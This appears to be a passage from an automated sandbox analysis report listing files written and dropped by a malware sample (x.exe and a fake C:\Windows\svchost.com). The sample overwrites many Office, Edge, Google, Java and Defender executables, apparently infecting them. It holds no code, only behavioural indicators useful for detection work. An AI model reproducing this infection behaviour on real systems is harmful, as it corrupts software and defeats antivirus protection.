                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
                              Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
                              Source: C:\Users\user\Desktop\x.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                              Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Windows\svchost.com
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\user\AppData\Local\Temp\chrome.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
                              Source: C:\Windows\svchost.com | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                              Source: C:\Users\user\Desktop\x.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exe
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
